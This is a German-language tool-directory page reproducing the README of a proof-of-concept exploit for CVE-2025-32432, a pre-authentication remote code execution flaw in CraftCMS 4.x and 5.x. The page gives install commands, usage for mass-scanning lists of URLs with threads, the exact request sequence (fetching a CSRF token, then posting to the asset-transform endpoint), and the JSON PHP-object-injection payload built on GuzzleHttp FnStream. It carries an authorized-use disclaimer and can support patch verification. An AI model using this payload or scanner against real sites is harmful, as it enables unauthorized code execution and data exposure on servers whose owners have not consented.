Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32432 — Dieses Repository enthält ein Proof-of-Concept-Exploit-Skript für CVE-2025-32432, eine Pre-Authentication-Schwachstelle zur Remote Code Execution (RCE), die CraftCMS Versionen 4.x und 5.x betrifft. Die Schwachstelle besteht in der Asset-Transform-Generierungsfunktion von CraftCMS. | Kitploit
Tools/GitHubGitHub/sachinart/cve-2025-32432
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubsachinart/cve-2025-32432

CVE-2025-32432

Repository anzeigen
2743vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Repository enthält ein Proof-of-Concept-Exploit-Skript für CVE-2025-32432, eine Pre-Authentication-Schwachstelle zur Remote Code Execution (RCE), die CraftCMS Versionen 4.x und 5.x betrifft. Die Schwachstelle besteht in der Asset-Transform-Generierungsfunktion von CraftCMS.

Teilen

CraftCMS CVE-2025-32432 Exploit von Chirag Artani

Übersicht

Dieses Repository enthält ein Proof-of-Concept-Exploit-Skript für CVE-2025-32432, eine Remote Code Execution (RCE)-Schwachstelle ohne Authentifizierung, die CraftCMS Versionen 4.x und 5.x betrifft. Die Schwachstelle existiert in der Funktion zur Generierung von Asset-Transformationen von CraftCMS.

Dieses Exploit-Skript automatisiert die Erkennung und Überprüfung der Schwachstelle durch:

  1. Extrahieren von CSRF-Tokens aus dem CraftCMS-Admin-Dashboard
  2. Ausnutzen der Schwachstelle durch PHP-Objekt-Injection
  3. Überprüfen der erfolgreichen Ausnutzung durch Extrahieren von Systeminformationen

Haftungsausschluss

⚠️ Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests.

Verwenden Sie dieses Tool nur gegen Systeme, für die Sie ausdrücklich die Erlaubnis zum Testen haben. Nicht autorisierte Tests gegen Systeme ohne Erlaubnis sind illegal und unethisch.

Funktionen

  • Unterstützung für Einzelziel- und Mehrziel-Scans (dateibasiert)
  • Multithreading-Fähigkeit für schnellere Scans mehrerer Ziele
  • Detaillierte Ausgabe mit Datenbanknamen und Home-Verzeichnis-Informationen
  • CSV-Berichtserstellung für verwundbare Ziele
  • SSL-Überprüfungsumgehung für Tests mit selbstsignierten Zertifikaten
  • Robuste Fehlerbehandlung

Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Erforderliche Abhängigkeiten installieren
pip install -r requirements.txt

Voraussetzungen

  • Python 3.6+
  • Erforderliche Python-Pakete (siehe requirements.txt):
    • requests
    • beautifulsoup4
    • urllib3

Verwendung

Einzelziel

Um ein einzelnes Ziel zu scannen:

root@kitploit:~
python3 craftcms_rce.py -u example.com

Mehrere Ziele

Um mehrere Ziele aus einer Datei zu scannen (eine URL pro Zeile):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

Wobei -t die Anzahl der zu verwendenden Threads angibt (Standard ist 5).

Optionen

root@kitploit:~
-u, --url     Einzelne URL zum Testen
-f, --file    Datei mit URLs zum Testen (eine pro Zeile)
-t, --threads Anzahl der Threads (Standard: 5)
-h, --help    Hilfemeldung anzeigen und beenden

Ausgabe

Das Skript gibt Ergebnisse auf der Konsole aus und speichert verwundbare Ziele in vulnerable.txt im CSV-Format mit den folgenden Spalten:

  • URL
  • CRAFT_DB_DATABASE-Wert (Datenbankname)
  • HOME-Verzeichnispfad
  • Andere Systeminformationen

Beispiel für Konsolenausgabe:

root@kitploit:~
[*] Teste Einzelziel: https://example.com
[*] Starte Scan mit 5 Threads
[+] VERWUNDBAR: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME-Verzeichnis: /home/example

=== SCAN-ZUSAMMENFASSUNG ===
Gesamt gescannte URLs: 1
Verwundbare Seiten: 1
Detaillierte Ergebnisse gespeichert in vulnerable.txt

Wie die Schwachstelle funktioniert

Diese Schwachstelle nutzt ein Deserialisierungsproblem in CraftCMS aus. Der Exploit:

  1. Sendet eine GET-Anfrage an /index.php?p=admin/dashboard, um ein CSRF-Token abzurufen
  2. Sendet eine POST-Anfrage an /index.php?p=admin/actions/assets/generate-transform mit einem speziell präparierten JSON-Payload
  3. Das Payload enthält ein PHP-Objekt, das deserialisiert wird, was zur Ausführung beliebigen Codes über die Klasse GuzzleHttp\Psr7\FnStream führt
  4. Die erfolgreiche Ausnutzung wird durch Ausführen von phpinfo() und Extrahieren spezifischer Systeminformationen überprüft

Technische Details

Der Exploit nutzt eine unsichere Deserialisierung im Asset-Transformationsgenerierungsprozess aus. Der anfällige Codepfad erlaubt es einem Angreifer, ein benutzerdefiniertes PHP-Objekt zu injizieren, das unserialisiert wird, was zur Ausführung beliebigen Codes führt.

Die Schlüsselkomponenten des Payloads:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

Mitwirken

Beiträge, Probleme und Funktionsanfragen sind willkommen! Schauen Sie gerne auf der Issues-Seite vorbei.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Referenzen

  • CVE-2025-32432 Details
  • CraftCMS Sicherheitshinweise

Autor

  • Nicolas Bourras (Orange Cyberdefense) – Ursprüngliche Entdeckung der Schwachstelle
  • Chirag Artani – Autor des Exploit-Skripts
Tool herunterladen